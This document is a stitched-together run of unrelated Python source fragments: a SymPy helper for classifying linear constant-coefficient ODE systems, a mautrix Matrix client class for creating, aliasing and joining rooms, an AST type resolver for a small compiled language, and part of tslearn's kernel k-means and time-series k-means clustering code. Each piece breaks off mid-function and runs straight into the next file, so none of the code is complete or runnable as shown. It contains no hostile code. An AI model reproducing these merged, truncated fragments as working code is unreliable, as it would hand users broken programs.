Cvect = Matrix(list(next(constants) for _ in range(n)))
sol_vector = P * (J * Cvect)
sol_vector = [collect(s, ordered(J.atoms(exp)), exact=True) for s in sol_vector]
sol_dict = [Eq(func[i], sol_vector[i]) for i in range(n)]
return sol_dict
def _matrix_is_constant(M, t):
"""Checks if the matrix M is independent of t or not."""
return all(coef.as_independent(t, as_Add=True)[1] == 0 for coef in M)
def _canonical_equations(eqs, funcs, t):
"""Helper function that solves for first order derivatives in a system"""
from sympy.solvers.solvers import solve
# For now the system of ODEs dealt by this function can have a
# maximum order of 1.
if any(ode_order(eq, func) > 1 for eq in eqs for func in funcs):
msg = "Cannot represent system in {}-order canonical form"
raise ODEOrderError(msg.format(1))
canon_eqs = solve(eqs, *[func.diff(t) for func in funcs], dict=True)
if len(canon_eqs) != 1:
raise ODENonlinearError("System of ODEs is nonlinear")
canon_eqs = canon_eqs[0]
canon_eqs = [Eq(func.diff(t), canon_eqs[func.diff(t)]) for func in funcs]
return canon_eqs
def neq_nth_linear_constant_coeff_match(eqs, funcs, t):
r"""
Returns a dictionary with details of the eqs if every equation is constant coefficient
and linear else returns None
Explanation
===========
This function takes the equations in eqs and converts them into the form Ax = b, where x is a vector of
terms containing the dependent variables and their derivatives up to their maximum order. If it is
possible to convert eqs into Ax = b, then all the equations in eqs are linear; otherwise
they are non-linear.
To check if the equations are constant coefficient, we need to check if all the terms in
A obtained above are constant or not.
To check if the equations are homogeneous or not, we need to check if b is a zero matrix
or not.
Parameters
==========
eqs: List
List of ODEs
funcs: List
List of dependent variables
t: Symbol
Independent variable of the equations in eqs
Returns
=======
match = {
'no_of_equation': len(eqs),
'eq': eqs,
'func': funcs,
'order': order,
'is_linear': is_linear,
'is_constant': is_constant,
'is_homogeneous': is_homogeneous,
}
Dict or None
Dict with values for keys:
1. no_of_equation: Number of equations
2. eq: The set of equations
3. func: List of dependent variables
4. order: A dictionary that gives the order of the
dependent variable in eqs
5. is_linear: Boolean value indicating if the set of
equations are linear or not.
6. is_constant: Boolean value indicating if the set of
equations have constant coefficients or not.
7. is_homogeneous: Boolean value indicating if the set of
equations are homogeneous or not.
This Dict is the answer returned if the eqs are linear and constant
coefficient. Otherwise, None is returned.
"""
# Error for i == 0 can be added but isn't for now
# Removing the duplicates from the list of funcs
# meanwhile maintaining the order. This is done
# since the line in classify_sysode: list(set(funcs)
# cause some test cases to fail when gives different
# results in different versions of Python.
funcs = list(uniq(funcs))
# Check for len(funcs) == len(eqs)
if len(funcs) != len(eqs):
raise ValueError("Number of functions given is not equal to the number of equations %s" % funcs)
# ValueError when functions have more than one arguments
for func in funcs:
if len(func.args) != 1:
raise ValueError("dsolve() and classify_sysode() work with "
"functions of one variable only, not %s" % func)
# Getting the func_dict and order using the helper
# function
order = _get_func_order(eqs, funcs)
if not all(order[func] == 1 for func in funcs):
return None
else:
# To be changed when this function is updated.
# In the future this will be updated to the maximum
# order found in the system.
system_order = 1
# Not adding the check if the len(func.args) for
# every func in funcs is 1
# Linearity check
try:
canon_eqs = _canonical_equations(eqs, funcs, t)
As, b = linear_ode_to_matrix(canon_eqs, funcs, t, system_order)
# When the system of ODEs is non-linear, an ODENonlinearError is raised.
# When system has an order greater than what is specified in system_order,
# ODEOrderError is raised.
# This function catches these errors and None is returned
except (ODEOrderError, ODENonlinearError):
return None
A = As[1]
is_linear = True
# Constant coefficient check
is_constant = _matrix_is_constant(A, t)
# Homogeneous check
is_homogeneous = bool(b.is_zero_matrix)
match = {
'no_of_equation': len(eqs),
'eq':
# Copyright (c) 2022 <NAME>
#
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
from __future__ import annotations
from typing import Any, Awaitable, Callable, Iterable
import asyncio
from multidict import CIMultiDict
from mautrix.api import Method, Path
from mautrix.errors import MatrixRequestError, MatrixResponseError, MNotFound, MRoomInUse
from mautrix.types import (
JSON,
DirectoryPaginationToken,
EventID,
EventType,
Membership,
MemberStateEventContent,
PowerLevelStateEventContent,
RoomAlias,
RoomAliasInfo,
RoomCreatePreset,
RoomCreateStateEventContent,
RoomDirectoryResponse,
RoomDirectoryVisibility,
RoomID,
Serializable,
StateEvent,
StrippedStateEvent,
UserID,
)
from .base import BaseClientAPI
from .events import EventMethods
class RoomMethods(EventMethods, BaseClientAPI):
"""
Methods in section 8 Rooms of the spec. These methods are used for creating rooms, interacting
with the room directory and using the easy room metadata editing endpoints. Generic state
setting and sending events are in the :class:`EventMethods` (section 7) module.
See also: `API reference <https://spec.matrix.org/v1.1/client-server-api/#rooms-1>`__
"""
# region 8.1 Creation
# API reference: https://spec.matrix.org/v1.1/client-server-api/#creation
async def create_room(
self,
alias_localpart: str | None = None,
visibility: RoomDirectoryVisibility = RoomDirectoryVisibility.PRIVATE,
preset: RoomCreatePreset = RoomCreatePreset.PRIVATE,
name: str | None = None,
topic: str | None = None,
is_direct: bool = False,
invitees: list[UserID] | None = None,
initial_state: Iterable[StateEvent | StrippedStateEvent | dict[str, JSON]] | None = None,
room_version: str = None,
creation_content: RoomCreateStateEventContent | dict[str, JSON] | None = None,
power_level_override: PowerLevelStateEventContent | dict[str, JSON] | None = None,
) -> RoomID:
"""
Create a new room with various configuration options.
See also: `API reference <https://spec.matrix.org/v1.1/client-server-api/#post_matrixclientv3createroom>`__
Args:
alias_localpart: The desired room alias **local part**. If this is included, a room
alias will be created and mapped to the newly created room. The alias will belong
on the same homeserver which created the room. For example, if this was set to
"foo" and sent to the homeserver "example.com" the complete room alias would be
``#foo:example.com``.
visibility: A ``public`` visibility indicates that the room will be shown in the
published room list. A ``private`` visibility will hide the room from the published
room list. Defaults to ``private``. **NB:** This should not be confused with
``join_rules`` which also uses the word ``public``.
preset: Convenience parameter for setting various default state events based on a
preset. Defaults to private (invite-only).
name: If this is included, an ``m.room.name`` event will be sent into the room to
indicate the name of the room. See `Room Events`_ for more information on
``m.room.name``.
topic: If this is included, an ``m.room.topic`` event will be sent into the room to
indicate the topic for the room. See `Room Events`_ for more information on
``m.room.topic``.
is_direct: This flag makes the server set the ``is_direct`` flag on the
`m.room.member`_ events sent to the users in ``invite`` and ``invite_3pid``. See
`Direct Messaging`_ for more information.
invitees: A list of user IDs to invite to the room. This will tell the server to invite
everyone in the list to the newly created room.
initial_state: A list of state events to set in the new room. This allows the user to
override the default state events set in the new room. The expected format of the
state events are an object with type, state_key and content keys set.
Takes precedence over events set by ``preset``, but gets overridden by ``name``
and ``topic`` keys.
room_version: The room version to set for the room. If not provided, the homeserver
will use its configured default.
creation_content: Extra keys, such as ``m.federate``, to be added to the
``m.room.create`` event. The server will ignore ``creator`` and ``room_version``.
Future versions of the specification may allow the server to ignore other keys.
power_level_override: The power level content to override in the default power level
event. This object is applied on top of the generated ``m.room.power_levels`` event
content prior to it being sent to the room. Defaults to overriding nothing.
Returns:
The ID of the newly created room.
Raises:
MatrixResponseError: If the response does not contain a ``room_id`` field.
.. _Room Events: https://spec.matrix.org/v1.1/client-server-api/#room-events
.. _Direct Messaging: https://spec.matrix.org/v1.1/client-server-api/#direct-messaging
.. _m.room.create: https://spec.matrix.org/v1.1/client-server-api/#mroomcreate
.. _m.room.member: https://spec.matrix.org/v1.1/client-server-api/#mroommember
"""
content = {
"visibility": visibility.value,
"is_direct": is_direct,
"preset": preset.value,
}
if alias_localpart:
content["room_alias_name"] = alias_localpart
if invitees:
content["invite"] = invitees
if name:
content["name"] = name
if topic:
content["topic"] = topic
if initial_state:
content["initial_state"] = [
event.serialize() if isinstance(event, Serializable) else event
for event in initial_state
]
if room_version:
content["room_version"] = room_version
if creation_content:
content["creation_content"] = (
creation_content.serialize()
if isinstance(creation_content, Serializable)
else creation_content
)
# Remove keys that the server will ignore anyway
content["creation_content"].pop("room_version", None)
if power_level_override:
content["power_level_content_override"] = (
power_level_override.serialize()
if isinstance(power_level_override, Serializable)
else power_level_override
)
resp = await self.api.request(Method.POST, Path.v3.createRoom, content)
try:
return resp["room_id"]
except KeyError:
raise MatrixResponseError("`room_id` not in response.")
# endregion
# region 8.2 Room aliases
# API reference: https://spec.matrix.org/v1.1/client-server-api/#room-aliases
async def add_room_alias(
self, room_id: RoomID, alias_localpart: str, override: bool = False
) -> None:
"""
Create a new mapping from room alias to room ID.
See also: `API reference <https://matrix.org/docs/spec/client_server/r0.4.0.html#put-matrix-client-r0-directory-room-roomalias>`__
Args:
room_id: The room ID to set.
alias_localpart: The localpart of the room alias to set.
override: Whether or not the alias should be removed and the request retried if the
server responds with HTTP 409 Conflict
"""
room_alias = f"#{alias_localpart}:{self.domain}"
content = {"room_id": room_id}
try:
await self.api.request(Method.PUT, Path.v3.directory.room[room_alias], content)
except MatrixRequestError as e:
if e.http_status == 409:
if override:
await self.remove_room_alias(alias_localpart)
await self.api.request(Method.PUT, Path.v3.directory.room[room_alias], content)
else:
raise MRoomInUse(e.http_status, e.message) from e
else:
raise
async def remove_room_alias(self, alias_localpart: str, raise_404: bool = False) -> None:
"""
Remove a mapping of room alias to room ID.
Servers may choose to implement additional access control checks here, for instance that
room aliases can only be deleted by their creator or server administrator.
See also: `API reference <https://matrix.org/docs/spec/client_server/r0.4.0.html#delete-matrix-client-r0-directory-room-roomalias>`__
Args:
alias_localpart: The room alias to remove.
raise_404: Whether 404 errors should be raised as exceptions instead of ignored.
"""
room_alias = f"#{alias_localpart}:{self.domain}"
try:
await self.api.request(Method.DELETE, Path.v3.directory.room[room_alias])
except MNotFound:
if raise_404:
raise
# else: ignore
async def resolve_room_alias(self, room_alias: RoomAlias) -> RoomAliasInfo:
"""
Request the server to resolve a room alias to a room ID.
The server will use the federation API to resolve the alias if the domain part of the alias
does not correspond to the server's own domain.
See also: `API reference <https://spec.matrix.org/v1.1/client-server-api/#get_matrixclientv3directoryroomroomalias>`__
Args:
room_alias: The room alias.
Returns:
The room ID and a list of servers that are aware of the room.
"""
content = await self.api.request(Method.GET, Path.v3.directory.room[room_alias])
return RoomAliasInfo.deserialize(content)
# endregion
# region 8.4 Room membership
# API reference: https://spec.matrix.org/v1.1/client-server-api/#room-membership
async def get_joined_rooms(self) -> list[RoomID]:
"""Get the list of rooms the user is in."""
content = await self.api.request(Method.GET, Path.v3.joined_rooms)
try:
return content["joined_rooms"]
except KeyError:
raise MatrixResponseError("`joined_rooms` not in response.")
# region 8.4.1 Joining rooms
# API reference: https://spec.matrix.org/v1.1/client-server-api/#joining-rooms
async def join_room_by_id(
self,
room_id: RoomID,
third_party_signed: JSON = None,
extra_content: dict[str, Any] | None = None,
) -> RoomID:
"""
Start participating in a room, i.e. join it by its ID.
See also: `API reference <https://spec.matrix.org/v1.1/client-server-api/#post_matrixclientv3roomsroomidjoin>`__
Args:
room_id: The ID of the room to join.
third_party_signed: A signature of an ``m.third_party_invite`` token to prove that this
user owns a third party identity which has been invited to the room.
extra_content: Additional properties for the join event content.
If a non-empty dict is passed, the join event will be created using
the ``PUT /state/m.room.member/...`` endpoint instead of ``POST /join``.
Returns:
The ID of the room the user joined.
"""
if extra_content:
await self.send_member_event(
room_id, self.mxid, Membership.JOIN, extra_content=extra_content
)
return room_id
content = await self.api.request(
Method.POST,
Path.v3.rooms[room_id].join,
{"third_party_signed": third_party_signed} if third_party_signed is not None else None,
)
try:
return content["room_id"]
except KeyError:
raise MatrixResponseError("`room_id` not in response.")
async def join_room(
self,
room_id_or_alias: RoomID | RoomAlias,
servers: list[str] | None = None,
third_party_signed: JSON = None,
max_retries: int = 4,
) -> RoomID:
"""
Start participating in a room, i.e. join it by its ID or alias, with an optional list of
servers to ask about the ID
<gh_stars>1-10
import ast
import builtins
import basetype
def chooseType(left, right):
# print('chooseType', left, right, left.getType(), right.getType())
return left.getType()
class TypeMatcher(ast.AstVisitor):
def __init__(self):
ast.AstVisitor.__init__(self)
self.opname = 'matchType'
self.name = 'typeMatcher'
def visit(self, astree):
return astree
def matchType_UserType(self, ut, gtype, types):
# self.logger.debug('matchType_UserType', ut, gtype, types)
assert(isinstance(gtype, ast.UserType))
assert(len(gtype.path) == 1)
for t in types:
if t == gtype.path[0]:
# self.logger.debug('matchType_UserType match', ut, gtype, types, t)
return t, ut
assert(False)
class Resolver(ast.AstVisitor):
def __init__(self):
ast.AstVisitor.__init__(self)
self.opname = 'resolve'
self.name = 'resolver'
def visit(self, astree):
# self.logger.debug('Resolver.visit', self, astree, len(astree.definitions))
self.ast = astree
for i in self.ast.imports:
i.visit(self)
for d in self.ast.definitions:
d.visit(self)
return self.ast
def resolve_Import(self, i):
# self.logger.debug('resolve_Import', i, i.path)
pass
def resolveAttr_EnumDef(self, enumdef, attr):
ret = enumdef.findMember(attr.ref)
assert ret, (enumdef, attr, ret, attr.ref, attr.object, enumdef.symbols)
return ret
def resolveAttr_ClassDef(self, cls, attr):
ret = cls.findMember(attr.ref)
assert ret, (cls, attr, ret, attr.ref, attr.object, cls.functions, cls.vars, cls.symbols)
return ret
def resolve_ClassDef(self, cls):
# self.logger.debug('resolve_ClassDef', cls, cls.name, len(cls.definitions))
if cls.isProtoType():
for p in cls.genericParams[:]:
p.visit(self)
return
if cls.resolved:
return cls
cls.resolved = True
for s in cls.scripts:
# self.logger.debug('resolve_ClassDef script', s)
s.visit(self)
for b in cls.bases:
b.visit(self)
# self.logger.debug('resolve_ClassDef base', cls, cls.name, b)
for s in b.getTarget().scripts:
if s.getTarget().inherit:
# self.logger.debug('resolve_ClassDef base script', s, s.caller, s.args)
s2 = ast.Script(s.caller.path, s.args, s.namedArgs)
cls.scripts.append(s2)
s2.setOwner(cls)
s2.visit(self)
for d in cls.definitions:
# self.logger.debug('resolve_ClassDef def', cls.name, d)
d.visit(self)
def resolve_FuncDef(self, func):
# self.logger.debug('resolve_FuncDef', func.name, func.resolved, func.cls, func)
assert func.owner, (func, func.owner)
owner = func.owner
assert isinstance(owner, ast.ClassDef) or isinstance(owner, ast.CodeUnit) or isinstance(owner, ast.ExtensionDef), 'resolve_ClassDef owner is invalid: %s %s' % (owner, func)
#assert isinstance(owner, ast.ClassDef) or isinstance(owner, ast.CodeUnit), 'resolve_FuncDef owner=%s' % owner
if func.resolved:
# assert func.spec.returnType, (func.name, func.spec.returnType, func)
return
func.resolved = True
# self.logger.debug('resolve_FuncDef start', func, func.name)
for param in func.spec.params:
param.visit(self)
if func.cls is None and isinstance(owner, ast.ClassDef):
func.cls = owner
func.spec.visit(self)
func.body.visit(self)
if func.spec.returnType is None:
if len(func.body.statements) == 0:
func.spec.returnType = ast.makePrimitiveType('void')
else:
lastStmt = func.body.statements[-1]
# self.logger.debug('resolve_FuncDef rettype', func.name, func, lastStmt)
if isinstance(lastStmt, ast.Return) and lastStmt.value:
assert func.spec.returnType is None, (func, func.spec)
func.spec.returnType = lastStmt.value.getType().clone()
# self.logger.debug('resolve_FuncDef rettype with return', lastStmt, lastStmt.value.getType(), func, func.spec)
else:
func.spec.returnType = ast.makePrimitiveType('void')
self.setupNewItem(func.spec.returnType, func.spec, True)
if func.spec.returnType is None:
assert False, (func, func.spec)
# self.logger.debug('resolve_FuncDef end', func.name, func.resolved, func.spec.returnType, func.cls, func)
def resolve_ForEachStatement(self, stmt=None):
stmt.collection.visit(self)
if stmt.item.getType() is None:
stmt.item.setupType(stmt.collection.getType().getItemType(), self)
stmt.body.visit(self)
def resolve_ForEachDictStatement(self, stmt):
# self.logger.debug('resolve_ForEachDictStatement', stmt, stmt.collection, stmt.collection.getType(), stmt.key, stmt.value)
stmt.collection.visit(self)
# self.logger.debug('resolve_ForEachDictStatement type', stmt, stmt.collection, stmt.collection.getType(), stmt.key, stmt.value)
if stmt.key.getType() is None:
stmt.key.setupType(stmt.collection.getType().getKeyType(), self)
if stmt.value.getType() is None:
stmt.value.setupType(stmt.collection.getType().getValueType(), self)
stmt.key.visit(self)
stmt.value.visit(self)
# self.logger.debug('resolve_ForEachDictStatement', stmt.collection.getTarget())
stmt.body.visit(self)
def resolve_Script(self, script):
sfunc = self.ast.project.findScript(script.caller.path)
# self.logger.debug('resolve_Script', script, script.caller, sfunc, script.caller.path)
script.setTarget(sfunc)
sfunc.visit(self, script)
def resolve_FuncSpec(self, funcspec):
if funcspec.returnType:
funcspec.returnType.visit(self)
for param in funcspec.params:
param.visit(self)
funcspec.setupTypeClass(basetype.FunctionClass(funcspec), self)
# self.logger.debug('resolve_FuncSpec end', funcspec, funcspec.returnType, funcspec.params)
def resolve_TupleVarDef(self, var):
if var.initial:
var.initial.visit(self)
if var.type is None:
var.type = var.initial.getType()
if var.type:
assert isinstance(var.type, ast.UserType) and var.type.fullpath == 'Tuple', ('resolve_TupleVarDef', var, var.type, var.initial)
etypes = var.type.getTarget().instantiation.genericArgs[0].types
for i in range(len(var.vars)):
var.vars[i].setExpectedType(etypes[i])
var.vars[i].visit(self)
def resolve_SingleVarDef(self, var):
# self.logger.debug('resolve_SingleVarDef', var.name, var, var.owner, var)
owner = var.owner
assert owner == var.owner
assert var.getType() is None or isinstance(var.getType(), ast.Type), (var, var.getType(), var.expectedType, var.initial)
if var.initial:
# self.logger.debug('resolve_SingleVarDef initial', var, var.name, var.initial)
var.initial.visit(self)
# self.logger.debug('resolve_SingleVarDef initial2', var, var.initial, var.initial.getType())
if var.getType():
var.getType().visit(self)
# self.logger.debug('resolve_SingleVarDef type', var, var.getType(), var.getTypeClass())
else:
# self.logger.debug('resolve_SingleVarDef initial type', var, var.initial, var.getOwnerFunc())
assert (var.initial and var.initial.getType()) or var.expectedType, (var, var.getOwnerFunc(), var.getOwnerFullContext(), var.initial, var.getType())
var.setupType((var.initial.getType() if var.initial else None) or var.expectedType, self)
assert isinstance(var.getType(), ast.Type), (var, var.getType(), var.expectedType, var.initial)
# self.logger.debug('resolve_SingleVarDef initial type', var, var.getType())
# self.logger.debug('resolve_SingleVarDef type_class', var.name, var.getTypeClass(), id(var), var.getType().getTarget())
assert var.getType() is None or isinstance(var.getType(), ast.Type), (var, var.getType(), var.expectedType, var.initial)
if hasattr(var.getTypeClass(), 'rettype'):
var.returnType = var.getTypeClass().returnType
assert var.getType(), var
assert var.getTypeClass(), ('resolve_SingleVarDef', var, var.getType(), var.getOwnerFunc(), var.getOwnerClass())
assert var.getType().getTypeClass(), var.getType()
def resolve_GenericExpr(self, expr):
expr.visitChildren(self)
target = expr.base.getTarget()
target = target.instantiate(expr.genericArgs, self)
# self.logger.debug('resolve_GenericExpr target', expr, expr.base, expr.target, target)
assert target
expr.target = target
def resolve_ConstSpec(self, var):
# self.logger.debug('resolve_ConstSpec', var.name, var, var.owner)
owner = var.owner
assert owner == var.owner
if var.initial:
# self.logger.debug('resolve_ConstSpec initial', var, var.name, var.initial)
var.initial.visit(self)
# self.logger.debug('resolve_ConstSpec initial2', var, var.initial, var.initial.getType())
if var.getType():
var.getType().visit(self)
# self.logger.debug('resolve_ConstSpec type', var, var.getType(), var.getTypeClass())
else:
assert(var.initial and var.initial.getType())
self.ast.setType(var, var.initial.getType())
var.getType().visit(self)
# self.logger.debug('resolve_ConstSpec initial type', var, var.getType())
# self.logger.debug('resolve_ConstSpec type_class', var.name, var.getTypeClass(), id(var))
if hasattr(var.getTypeClass(), 'rettype'):
var.returnType = var.getTypeClass().returnType
assert var.getType(), var
assert var.getTypeClass(), var.getType()
assert var.getType().getTypeClass(), var.getType()
def resolveCall_AttrRef(self, attrref, callinfo):
# self.logger.debug('resolveCall_AttrRef', attrref, callinfo, callinfo.caller, callinfo.caller.getTarget())
callinfo.caller.getTarget().resolveCall(self, callinfo)
def resolveCall_SingleVarDef(self, var, callinfo):
# self.logger.debug('resolveCall_SingleVarDef', var, callinfo)
pass
def resolveCall_Identifier(self, idvar, callinfo):
# self.logger.debug('resolveCall_Identifier', idvar, callinfo, callinfo.caller.getTarget())
if callinfo.caller.getTarget():
callinfo.caller.getTarget().resolveCall(self, callinfo)
def resolve_Return(self, stmt):
rettype = stmt.getOwnerFunc().spec.returnType
# self.logger.debug('resolve_Return', stmt.values, stmt, rettype, stmt.getOwnerFunc(), stmt.getOwnerClass())
stmt.expected_type = rettype
expr = stmt.value
# self.logger.debug('resolve_Return expr', stmt, expr, rettype)
assert not isinstance(expr, list), ('resolve_Return value is list', expr, rettype, stmt, stmt.getOwnerFunc())
if expr is not None:
expr.setExpectedType(rettype)
expr.visit(self)
# self.logger.debug('resolve_Return need_return expr', expr, expr.getTarget())
def resolve_Call(self, callinfo):
# self.logger.debug('resolve_Call', callinfo, callinfo.caller, callinfo.caller.getTarget(), callinfo.args, callinfo.getType(), callinfo.getOwnerFunc())
callinfo.caller.visit(self)
assert callinfo.caller.getTarget(), ('resolve_Call caller.target', callinfo, callinfo.caller, callinfo.caller.getTarget(), callinfo.args, callinfo.getType(), callinfo.getOwnerFunc())
callinfo.caller.getTarget().visit(self)
callinfo.caller.getTarget().resolveCall(self, callinfo)
func = callinfo.caller.getTarget()
spec = callinfo.getSpec()
assert func.getSpec() is not None and spec, ('resolve_Call', callinfo, func, func.spec, spec)
# self.logger.debug('resolve_Call spec', callinfo, callinfo.caller, callinfo.args, spec, callinfo.getType())
for i in range(len(callinfo.args)):
arg = callinfo.args[i]
# self.logger.debug('resolve_Call arg %d' % i, arg, spec)
# self.logger.debug('resolve_Call arg %d' % i, arg, callinfo.caller, spec, arg.getType(), spec.params[i].getType() if i < len(spec.params) else None)
expectedArgType = spec.params[i].getType() if i < len(spec.params) else None
# self.logger.debug('resolve_Call arg visit', i, arg, callinfo.caller, expectedArgType, spec.params)
arg.setExpectedType(expectedArgType)
arg.visit(self)
if i < len(spec.params):
param = spec.params[i]
if arg.getType() is None:
assert False, (self, arg, param, arg.getType(), param.getType())
self.ast.setType(arg, param.getType())
if arg.getType() is None:
pass
# self.logger.debug('resolve_Call arg.resolve', callinfo, arg, arg.getTarget(), arg.getType(), arg.getType().getTarget())
assert arg.getType(), arg
for arginfo in callinfo.namedArgs:
name = arginfo.name
arg = arginfo.value
func = callinfo.caller.getTarget()
if isinstance(func, ast.ClassDef):
field = func.findLocalSymbol(name)
assert field, ('resolve_Call field', func, name, field, callinfo.getOwnerFunc())
arg.setExpectedType(field.getType())
arg.visit(self)
assert arg.getType(), ('resolve_Call named_arg arg.getType() is None:%s,%s' % (name, arg), arg.getOwnerFunc(), arg.getOwnerClass())
assert callinfo.getType(), (callinfo, spec)
def resolveAttr_AstNode(self, node, expr):
# self.logger.debug('resolveAttr_AstNode', node, expr, node.getTypeClass())
return node.getTypeClass().resolveAttr(self, expr) if node.getTypeClass() else None
def resolve_AttrRef(self, expr):
# self.logger.debug('resolve_AttrRef', expr, expr.object, expr.ref, expr.getOwnerFunc(), expr.object.getType(), expr.getOwnerFunc())
expr.object.visit(self)
expr.target = expr.object.resolveAttr(self, expr)
# self.logger.debug('resolve_AttrRef target 2', expr, expr.object, expr.ref, expr.target, expr.object.getType(), expr.object.getTypeClass(), expr.getOwner())
assert expr.getTarget(), ('resolve_AttrRef no target', expr, expr.object, expr.object.getType(), expr.ref, expr.getOwner())
if expr.getTarget():
expr.getTarget().visit(self)
return expr
def resolve_Identifier(self, expr):
owner = expr.owner
expr.target = owner.findSymbol(expr.name)
# self.logger.debug('resolve_Identifier target', expr, expr.name, expr.getTarget())
assert expr.getTarget(), (expr, expr.getTarget(), expr.getOwnerFunc())
expr.getTarget().visit(self)
assert expr.getType(), (expr, expr.getTarget(), expr.getTarget().getType())
# assert expr.getType().getTarget(), (expr, expr.getType(), expr.getTarget(), expr.getTarget().getType(), expr.owner, expr.getOwnerFunc())
if expr.name == 'funcname':
assert expr.getType(), expr
assert expr.getTypeClass(), expr
assert expr.getType().getTypeClass(), expr.getType()
# self.logger.debug('resolve_Identifier target', expr, expr.name, expr.getTarget(), expr.getType(), expr.getTypeClass())
def resolve_Assignment(self, expr=None):
# self.logger.debug('resolve_Assignment', expr, expr.targets, expr.values, expr.owner)
expr.visitChildren(self)
for i in range(len(expr.values)):
val = expr.values[i]
if isinstance(val, ast.ListLiteral) and (not val.values) and val.getType() is None:
val.expectedType = expr.targets[i].getType()
def resolve_NamedExpressionItem(self, item):
# assert False, (item, item.owner, item.value)
item.visitChildren(self)
def resolve_EnumDef(self, expr):
pass
def resolve_Break(self, expr):
pass
def resolve_Continue(self, expr):
pass
def resolve_This(self, expr):
# self.logger.debug('resolve_This', expr.owner, expr.getOwnerFunc(), expr.getOwnerClass())
if expr.getType() is None:
expr.setupType(ast.UserType([expr.getOwnerClass().name]), self)
def resolve_ListLiteral(self, literal):
# self.logger.debug('resolve_ListLiteral', self, literal, literal.owner, literal.expectedType, literal.getOwnerFunc())
if literal.getType() is None:
for val in literal.values:
val.visit(self)
if literal.values:
# assert not isinstance(literal.values[0].getType(), ast.ListType), literal.values[0]
assert not isinstance(literal.values[0].getType(), ast.ClassDef), literal.values[0]
# assert literal.values[0].getType(), literal.values[0]
if literal.values[0].getType():
literal.setupType(ast.createListType(literal.values[0].getType().clone()), self)
else:
if literal.expectedType:
literal.setupType(literal.expectedType, self)
else:
for val in literal.values:
val.visit(self)
literal.getType().visit(self)
return literal
def resolve_TupleLiteral(self, literal):
# self.logger.debug('resolve_TupleLiteral', self, literal, literal.owner, literal.getOwnerFunc())
if literal.expectedType:
assert isinstance(literal.expectedType, ast.UserType) and literal.expectedType.fullpath == 'Tuple' and isinstance(literal.expectedType.getTarget(), builtins.GenericTupleClassImpl), ('resolve_TupleLiteral', self, literal, literal.expectedType, literal.owner, literal.getOwnerFunc())
for i in range(len(literal.values)):
val = literal.values[i]
if literal.expectedType:
assert i < len(literal.expectedType.target.instantiation.genericArgs[0].types)
val.setExpectedType(literal.expectedType.target.instantiation.genericArgs[0].types[i])
val.visit(self)
if val.getType() is None:
assert literal.expectedType and isinstance(literal.expectedType, ast.UserType), ('resolve_TupleLiteral invalid type', literal.values, val, literal.expectedType, literal.getOwnerFunc())
if literal.getType() is None:
literal.setupType(ast.makeType(tuple([val.getType() for val in literal.values])), self)
def resolve_ListComprehensionFor(self, expr):
# self.logger.debug('ListComprehensionFor.resolve', self, expr)
expr.source.visit(self)
assert expr.source.getType().getItemType(), ('ListComprehensionFor.resolve', expr, | |
check_dims(X)
sample_weight = _check_sample_weight(sample_weight=sample_weight, X=X)
max_attempts = max(self.n_init, 10)
kernel_params = self._get_kernel_params()
if self.kernel == "gak":
self.sigma_gak_ = kernel_params.get("sigma", 1.)
if self.sigma_gak_ == "auto":
self.sigma_gak_ = sigma_gak(X)
else:
self.sigma_gak_ = None
self.labels_ = None
self.inertia_ = None
self.sample_weight_ = None
self._X_fit = None
# n_iter_ will contain the number of iterations the most
# successful run required.
self.n_iter_ = 0
n_samples = X.shape[0]
K = self._get_kernel(X)
sw = (sample_weight if sample_weight is not None
else numpy.ones(n_samples))
self.sample_weight_ = sw
rs = check_random_state(self.random_state)
last_correct_labels = None
min_inertia = numpy.inf
n_attempts = 0
n_successful = 0
while n_successful < self.n_init and n_attempts < max_attempts:
try:
if self.verbose and self.n_init > 1:
print("Init %d" % (n_successful + 1))
n_attempts += 1
self._fit_one_init(K, rs)
if self.inertia_ < min_inertia:
last_correct_labels = self.labels_
min_inertia = self.inertia_
self.n_iter_ = self._iter
n_successful += 1
except EmptyClusterError:
if self.verbose:
print("Resumed because of empty cluster")
if n_successful > 0:
self.labels_ = last_correct_labels
self.inertia_ = min_inertia
self._X_fit = X
return self
def _compute_dist(self, K, dist):
"""Compute a n_samples x n_clusters distance matrix using the kernel
trick."""
sw = self.sample_weight_
for j in range(self.n_clusters):
mask = (self.labels_ == j)
if numpy.sum(mask) == 0:
raise EmptyClusterError("try smaller n_cluster or better "
"kernel parameters")
# NB: we use a normalized kernel so k(x,x) = 1 for all x
# (including the centroid)
dist[:, j] = 2 - 2 * numpy.sum(sw[mask] * K[:, mask],
axis=1) / sw[mask].sum()
@staticmethod
def _compute_inertia(dist_sq):
return dist_sq.min(axis=1).sum()
def fit_predict(self, X, y=None):
"""Fit kernel k-means clustering using X and then predict the closest
cluster each time series in X belongs to.
It is more efficient to use this method than to sequentially call fit
and predict.
Parameters
----------
X : array-like of shape=(n_ts, sz, d)
Time series dataset to predict.
y
Ignored
Returns
-------
labels : array of shape=(n_ts, )
Index of the cluster each sample belongs to.
"""
return self.fit(X, y).labels_
def predict(self, X):
"""Predict the closest cluster each time series in X belongs to.
Parameters
----------
X : array-like of shape=(n_ts, sz, d)
Time series dataset to predict.
Returns
-------
labels : array of shape=(n_ts, )
Index of the cluster each sample belongs to.
"""
X = check_array(X, allow_nd=True, force_all_finite=False)
check_is_fitted(self, '_X_fit')
X = check_dims(X, X_fit_dims=self._X_fit.shape,
check_n_features_only=True)
K = self._get_kernel(X, self._X_fit)
n_samples = X.shape[0]
dist = numpy.zeros((n_samples, self.n_clusters))
self._compute_dist(K, dist)
return dist.argmin(axis=1)
def _more_tags(self):
return {'allow_nan': True, 'allow_variable_length': True}
class GlobalAlignmentKernelKMeans(KernelKMeans):
def __init__(self, **kwargs):
warnings.warn(
"`GlobalAlignmentKernelKMeans` is deprecated in version "
"0.4 and will be removed in 0.6. Use `KernelKMeans` "
"instead.",
DeprecationWarning, stacklevel=2)
super().__init__(**kwargs)
self.kernel = "gak"
class TimeSeriesKMeans(TransformerMixin, ClusterMixin,
TimeSeriesCentroidBasedClusteringMixin,
BaseModelPackage, TimeSeriesBaseEstimator):
"""K-means clustering for time-series data.
Parameters
----------
n_clusters : int (default: 3)
Number of clusters to form.
max_iter : int (default: 50)
Maximum number of iterations of the k-means algorithm for a single run.
tol : float (default: 1e-6)
Inertia variation threshold. If at some point, inertia varies less than
this threshold between two consecutive
iterations, the model is considered to have converged and the algorithm
stops.
n_init : int (default: 1)
Number of time the k-means algorithm will be run with different
centroid seeds. The final results will be the best output of n_init
